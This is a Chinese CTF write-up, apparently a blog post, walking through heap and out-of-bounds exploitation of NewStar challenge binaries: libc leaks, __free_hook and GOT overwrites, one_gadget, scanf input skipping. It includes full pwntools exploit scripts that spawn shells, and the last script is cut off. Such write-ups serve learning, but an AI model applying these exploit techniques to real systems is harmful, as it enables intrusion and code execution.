<h5 id="libc地址的泄露"><a href="#libc地址的泄露" class="headerlink" title="libc地址的泄露"></a>libc地址的泄露</h5><p>题目给了libc文件，很自然可以想到要泄露libc地址然后劫持某个函数为system就好了。官方WP给出的泄露libc地址的方法是，申请一个mmap大小范围的chunk，这个chunk的地址和libc靠得很近，打印这个note的data通过计算就可以得到libc基址。然后去网上学习了一下关于mmap申请内存的知识，得知malloc时如果申请的内存大于128kb就会交给mmap来分配，而他管理的内存是一个独立的内存页，刚好在libc加载地址的上面（低地址处）。自己写程序试验了一下，确实mmap分配的地址和0x7fxxxxxxxx很近：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">char</span> *a = (<span class="type">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x40000</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Mmap allocated at: %p\n&quot;</span>, a);</span><br><span class="line">    <span class="type">char</span> *b = (<span class="type">char</span> *)<span class="built_in">malloc</span>(<span class="number">0x40</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Brk allocated at: %p\n&quot;</span>, b);</span><br><span class="line">    <span class="built_in">free</span>(a);</span><br><span class="line">    <span class="built_in">free</span>(b);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>运行结果：</p>
<figure class="highlight haskell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">Mmap</span> allocated at: <span class="number">0x7fc84bc85010</span></span><br><span class="line"><span class="type">Brk</span> allocated at: <span class="number">0x555acfc816b0</span></span><br></pre></td></tr></table></figure>

<p>WP给出接收libc基址的语句是：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">libc_base=u64(recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x10</span>+<span class="number">0x41000</span></span><br></pre></td></tr></table></figure>

<p>这里的-0x10是从mem到chunk地址的计算，+0x40000显然是刚刚申请的mmap内存大小，但是这个0x1000是哪来的呢？花了半个小时去翻了glibc2.31的源码（实际上我并不知道是哪个版本的glibc，但其实根据给出的libc文件中函数偏移应该是可以确定的），最后在sysmalloc函数里找到了相关的语句：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">	  <span class="comment">/*</span></span><br><span class="line"><span class="comment">         Round to a multiple of page size.</span></span><br><span class="line"><span class="comment">         If MORECORE is not contiguous, this ensures that we only call it</span></span><br><span class="line"><span class="comment">         with whole-page arguments.  And if MORECORE is contiguous and</span></span><br><span class="line"><span class="comment">         this is not first time through, this preserves page-alignment of</span></span><br><span class="line"><span class="comment">         previous calls. Otherwise, we correct to page-align below.</span></span><br><span class="line"><span class="comment">       */</span></span><br><span class="line">size = ALIGN_UP (size, pagesize);</span><br></pre></td></tr></table></figure>

<p>mmap申请的chunk有一个特殊的对齐要求，他必须是pagesize，也就是0x1000的倍数。比方说我申请了一个0x40000大小的chunk，加上存放chunk数据的0x10，就有0x40010大小，要对齐，最终就会分配出0x41000大小的chunk。</p>
<h5 id="劫持-free-hook-getshell"><a href="#劫持-free-hook-getshell" class="headerlink" title="劫持__free_hook &amp; getshell"></a>劫持__free_hook &amp; getshell</h5><p>回到题目，泄露了libc后，就要考虑system的执行了。这里的libc版本是2.31（通过偏移可以查），所以可以通过劫持__free_hook来getshell。</p>
<p>__free_hook对我来说也是个新东西，因为我开始学习的2.35版本glibc已经取消了hook函数。hook钩子是一个弱类型的函数指针，它指向free(), malloc()等函数。比如__free_hook，若它不为空，则执行它所指向的函数。所以我们可以通过劫持hook来改变程序的执行流。</p>
<p>题目里data处存放着content的地址指向content，那么我们可以构造__free_hook指向system的libc地址。edit函数会对data的size字段做检查，所以修改指针的时候要注意保留size不变，这样才能成功修改content为system地址，最后再修改一个data为&#x2F;bin&#x2F;sh然后delete掉这个chunk就getshell了。</p>
<h5 id="EXP-1"><a href="#EXP-1" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">libc = ELF(<span class="string">&quot;libc.so.6&quot;</span>)</span><br><span class="line"><span class="comment"># 偏移测试libc版本</span></span><br><span class="line">log.success(<span class="built_in">hex</span>(libc.symbols[<span class="string">&#x27;system&#x27;</span>]))</span><br><span class="line">log.success(<span class="built_in">hex</span>(libc.symbols[<span class="string">&#x27;__free_hook&#x27;</span>]))</span><br><span class="line"><span class="comment"># 偏移测试libc版本</span></span><br><span class="line">r = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>, <span class="number">28306</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">idx, size, content=<span class="string">&#x27;a&#x27;</span></span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;&gt;&gt;&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;enter idx(0~15): &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;enter size: &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;write the note: &#x27;</span>)</span><br><span class="line">    r.sendline(content.encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;&gt;&gt;&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;enter idx(0~15): &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">idx, content</span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;&gt;&gt;&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;4&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;enter idx(0~15): &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;enter content: &#x27;</span>)</span><br><span class="line">    r.sendline(content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;&gt;&gt;&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;enter idx(0~15): &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x20</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x50000</span>)</span><br><span class="line">add(<span class="number">2</span>, <span class="number">0x20</span>)</span><br><span class="line">add(<span class="number">3</span>, <span class="number">0x20</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">4</span>, <span class="number">0x20</span>, <span class="string">&#x27;a&#x27;</span>*<span class="number">24</span>)</span><br><span class="line">show(<span class="number">4</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;a&#x27;</span>*<span class="number">24</span>)</span><br><span class="line"><span class="comment"># print(r.recv())</span></span><br><span class="line">libcbase = u64(r.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x10</span>+<span class="number">0x51000</span></span><br><span class="line">log.success(<span class="built_in">hex</span>(libcbase))</span><br><span class="line"></span><br><span class="line">free_hook = libc.symbols[<span class="string">&#x27;__free_hook&#x27;</span>]+libcbase</span><br><span class="line">system = libc.symbols[<span class="string">&#x27;system&#x27;</span>]+libcbase</span><br><span class="line">edit(<span class="number">4</span>, p64(<span class="number">0x50000</span>)+p64(<span class="number">0</span>)+p64(<span class="number">0</span>)+p64(free_hook))</span><br><span class="line">edit(<span class="number">1</span>, p64(system))</span><br><span class="line">edit(<span class="number">4</span>, <span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="0x04-message-board"><a href="#0x04-message-board" class="headerlink" title="0x04 message_board"></a>0x04 message_board</h3><h5 id="题目-1"><a href="#题目-1" class="headerlink" title="题目"></a>题目</h5><p>附件给出了libc2.31的文件</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall __noreturn <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> v3; <span class="comment">// [rsp+24h] [rbp-Ch] BYREF</span></span><br><span class="line">  <span class="type">int</span> v4; <span class="comment">// [rsp+28h] [rbp-8h] BYREF</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+2Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  init(argc, argv, envp);</span><br><span class="line">  board();</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">1</span>; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;You can modify your suggestions&quot;</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;v4);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;input new suggestion&quot;</span>);</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;v3);</span><br><span class="line">    a[v4] = v3;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>board函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> (**board())(<span class="type">const</span> <span class="type">char</span> *s)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> (**result)(<span class="type">const</span> <span class="type">char</span> *); <span class="comment">// rax</span></span><br><span class="line">  <span class="type">int</span> v1; <span class="comment">// [rsp+4h] [rbp-9Ch] BYREF</span></span><br><span class="line">  __int64 v2[<span class="number">18</span>]; <span class="comment">// [rsp+8h] [rbp-98h] BYREF</span></span><br><span class="line">  <span class="type">int</span> i; <span class="comment">// [rsp+9Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Do you have any suggestions for us&quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;v1);</span><br><span class="line">  <span class="keyword">if</span> ( v1 &gt; <span class="number">15</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;no!&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt; v1; ++i )</span><br><span class="line">  &#123;</span><br><span class="line">    __isoc99_scanf(<span class="string">&quot;%ld&quot;</span>, &amp;v2[i + <span class="number">1</span>]);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Your suggestion is %ld\n&quot;</span>, v2[i + <span class="number">1</span>]);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">puts</span>(<span class="string">&quot;Now please enter the verification code&quot;</span>);</span><br><span class="line">  __isoc99_scanf(<span class="string">&quot;%ld&quot;</span>, v2);</span><br><span class="line">  result = &amp;<span class="built_in">puts</span>;</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="type">int</span> (**)(<span class="type">const</span> <span class="type">char</span> *))v2[<span class="number">0</span>] != &amp;<span class="built_in">puts</span> )</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  <span class="keyword">return</span> result;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h5 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h5><p>主函数没有return，board函数的return也没法利用，所以肯定不是ROP。看到主函数里有一个自定义数组索引的输入，很容易想到数组越界。一看a数组刚好在bss段，所以可以利用数组越界修改exit的got表为one_gadget来getshell，偏移为-28。这里需要注意一个问题是，a数组储存的数据类型是dd（DWORD），也就是四个字节，所以写libc地址的时候需要分两次写到-28和-27偏移。不用system的原因是一个是没必要，第二也没地方写binsh。</p>
<p>在数组越界之前，在board函数里需要绕过一个“认证”，它要求我们输入puts的libc地址，这也就要求我们泄露libc地址。这里有个知识点，scanf无返回特性，利用这个特性我们可以结合printf打印出留存在栈上的libc地址，从而通过检查，进行数组越界。下面我们讲讲这个特性。</p>
<h5 id="scanf无返回特性"><a href="#scanf无返回特性" class="headerlink" title="scanf无返回特性"></a>scanf无返回特性</h5><p>这个特性比较有意思。众所周知，scanf只会接收格式化字符串指定的数据，那不符合的那些输入怎么办？答案是拒之门外或者扔掉。举个例子，如果他原本要接收%d的数据，结果你输入了123abc，那它会只接收123，而abc还存在stdin中；如果输入了超出了int范围的数字就会高位截断，也就是我们常说的整数溢出；如果直接输入字母，那么他不接收任何东西，如果原本变量上已经初始化了一个值，那么这个值依然不会变，但是如果接下来有多个scanf，程序会直接全部跳过；如果输入的是单独一个‘+’或‘-’，因为这两个字符对于int来说是合法的，但是又不存在数字，所以scanf选择接收，但是不会改变变量的值。综上所述，我们只要在scanf输入加号减号就可以跳过一次输入，并且不影响下面的输入。关于scanf其他特性，可以去看C0Lin师傅的总结：<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_54218833/article/details/121308367">以PWN视角看待C函数——scanf</a>。</p>
<p>我们看回到这道题，我们要尝试打印libc地址，栈上一般都会有libc地址留存，但是如果我们输入东西肯定会覆盖掉原本的内容，所以就需要用加减号绕过。我们先来看看原本board函数栈上的布局：</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/message_board%E6%A0%88%E5%B8%83%E5%B1%80.png" alt="message_board栈布局"></p>
<p>v2数组从rbp-0x98（0008处）开始，所以v2[2]就是一个libc地址，所以我们只要绕过2条建议的scanf就可以拿到libc地址了。</p>
<h5 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = remote(<span class="string">&quot;node5.buuoj.cn&quot;</span>, <span class="number">27152</span>)</span><br><span class="line"><span class="comment"># r=process(&#x27;./message_board&#x27;)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.31.so&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r.recv()</span><br><span class="line">r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;+&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;is &#x27;</span>)</span><br><span class="line">log.success(<span class="built_in">hex</span>(<span class="built_in">int</span>(r.recvuntil(<span class="string">b&#x27;\n&#x27;</span>).decode())))</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">b&#x27;+&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;is &#x27;</span>)</span><br><span class="line">libc_stderr = <span class="built_in">int</span>(r.recvuntil(<span class="string">b&#x27;\n&#x27;</span>).decode())</span><br><span class="line">log.success(<span class="built_in">hex</span>(libc_stderr))</span><br><span class="line">libcbase = libc_stderr-libc.symbols[<span class="string">&#x27;_IO_2_1_stderr_&#x27;</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>(libcbase))</span><br><span class="line">libc_puts = libcbase+libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">log.success(<span class="built_in">hex</span>((libc_puts)))</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;code\n&#x27;</span>)</span><br><span class="line">r.sendline(<span class="built_in">str</span>(libc_puts).encode())</span><br><span class="line"></span><br><span class="line">one = [<span class="number">0xe3afe</span>, <span class="number">0xe3b01</span>, <span class="number">0xe3b04</span>]</span><br><span class="line">libc_one = p64(one[<span class="number">1</span>]+libcbase)</span><br><span class="line">one_l = u32(libc_one[:<span class="number">4</span>])</span><br><span class="line">one_h = u32(libc_one[<span class="number">4</span>:])</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;You can modify your suggestions&quot;</span>, <span class="built_in">str</span>(-<span class="number">28</span>).encode())</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;input new suggestion&quot;</span>, <span class="built_in">str</span>(one_l).encode())</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;You can modify your suggestions&quot;</span>, <span class="built_in">str</span>(-<span class="number">27</span>).encode())</span><br><span class="line">r.sendlineafter(<span class="string">b&quot;input new suggestion&quot;</span>, <span class="built_in">str</span>(one_h).encode())</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>



<h3 id="0x05-god-of-change"><a href="#0x05-god-of-change" class="headerlink" title="0x05 god_of_change"></a>0x05 god_of_change</h3><h5 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h5><p>菜单堆题，有add，delete和show三个功能，其中add中写content的时候存在off by one的漏洞，自然而然想到劫持size字段造成overlapping。接触了这么多堆题，不难发现，提前规划堆布局很重要，所以先来考虑getshell的方式。最简单直接的getshell方式就是劫持__free_hook执行system函数，前提是知道libc基址。这道题开了PIE，所以很难通过got表来打印出libc地址，但是slot的数量上限是32个，每个slot大小最大是0x7F，所以可以考虑通过unsortedbin来泄露libc地址。所以这道题最重要的布局其实是对于泄露libc地址进行的。</p>
<h5 id="利用Unsortedbin泄露libc地址"><a href="#利用Unsortedbin泄露libc地址" class="headerlink" title="利用Unsortedbin泄露libc地址"></a>利用Unsortedbin泄露libc地址</h5><p>Unsortedbin由一个循环链表来维护，如下图所示：</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/unsortedbin%E5%BE%AA%E7%8E%AF%E9%93%BE%E8%A1%A8.png" alt="unsortedbin循环链表（from xswlhhh）"></p>
<p>而main_arena其实是一个libc地址，他在libc中与__malloc_hook函数有着固定的偏移，一般是0x10，如果有libc附件，我们就可以轻松得到libc基址。问题在于我们如何获取main_arena的地址。显然链表头（最后一个chunk）的fd和链表尾的bk（第一个chunk）都指向main_arena，如果我们能够free掉这两个chunk其中之一后依然能够打印chunk内容，我们就获得了libc地址。</p>
<h5 id="动调分析"><a href="#动调分析" class="headerlink" title="动调分析"></a>动调分析</h5><p>首先要先想办法把一个chunk放进unsortedbin中。程序中限制了申请的size不超过127，所以只能通过off by one来修改size。想要放进unsortedbin中至少要超过0x400的大小绕过tcachebin并且不能和top chunk相邻。由于每次只能改一个字节，所以需要通过chunk0修改chunk1，通过chunk1覆盖chunk2的头去改掉chunk2的size。这时候释放掉chunk2就能进unsortedbin。</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/god_of_change%E8%BF%9B%E5%85%A5unsortedbin.png" alt="god_of_change进入unsortedbin"></p>
<p>如上图会发现我还申请了很多0x80大小的chunk，是因为我需要防止修改完size的chunk2和topchunk相邻。如果相邻，那么free之后会直接被topchunk合并。</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/god_of_change%E8%A2%ABtopchunk%E5%90%88%E5%B9%B6.png" alt="god_of_change被topchunk合并"></p>
<p>接下来申请一个0x40大小的chunk，它会从chunk2中被切割下来，剩下那部分依然存在unsortedbin中。此时unsortedbin中只有一个chunk，所以他的fd和bk都是main_arena的地址。</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/god_of_change%E6%89%93%E5%8D%B0libc%E6%97%B6%E7%9A%84%E5%A0%86%E5%B8%83%E5%B1%80.png" alt="god_of_change打印libc时的堆布局"></p>
<p>可以看到这个地址和main_arena的偏移是0x60，所以libc的基址是泄露的地址-0x70-__malloc_hook的偏移。</p>
<p>接下来要劫持__free_hook为system的地址，并且要提前写入&#x2F;bin&#x2F;sh。思路是修改一个chunk的fd为hook的地址，然后申请一个相同大小的chunk就能申请到hook，然后修改其为system地址，然后立刻释放掉写有&#x2F;bin&#x2F;sh的chunk就getshell了。</p>
<p>我们先申请多一个0x40（总之是chunk2要一样的大小）大小的chunk，然后释放掉（chunk3）放入tcachebin中，后面用来申请到hook位置。然后释放掉之前申请的chunk2和chunk1。此时chunk1的一部分和chunk2是重叠的，所以申请chunk1大小的chunk就可以修改chunk2的fd，顺便在user_data开始处写sh，别忘了不要覆盖了chunk2的size字段。然后申请两个chunk2大小的chunk，第二个chunk就在hook地址，修改掉其指针为system。然后释放掉chunk1就getshell了。</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/god_of_change%E6%9C%80%E5%90%8E%E5%A0%86%E5%B8%83%E5%B1%80.png" alt="god_of_change最后堆布局"></p>
<p>通过debug找到hook的地址确认劫持成功：</p>
<p><img src="https://c-lby.github.io/images/newstar_week4_wp/god_of_change%E8%A2%AB%E4%BF%AE%E6%94%B9%E5%90%8E%E7%9A%84hook.png" alt="god_of_change被修改后的hook"></p>
<p>但是毕竟是patch过libc的可能libc的加载地址还是不太一样（上面libc地址一片空白我就觉得很奇怪了），在本地打不通，所以直接在线环境去尝试一下，是能通的。</p>
<h5 id="EXP-3"><a href="#EXP-3" class="headerlink" title="EXP"></a>EXP</h5><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">r = process(<span class="string">&#x27;./god_of_change&#x27;</span>)</span><br><span class="line"><span class="comment"># r = remote(&#x27;node5.buuoj.cn&#x27;, 25861)</span></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.31.so&#x27;</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size, content=<span class="string">b&#x27;deadbeef&#x27;</span></span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;Choice: &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;size: &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(size).encode())</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;content: &#x27;</span>)</span><br><span class="line">    r.send(content)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">idx</span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;Choice: &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;idx: 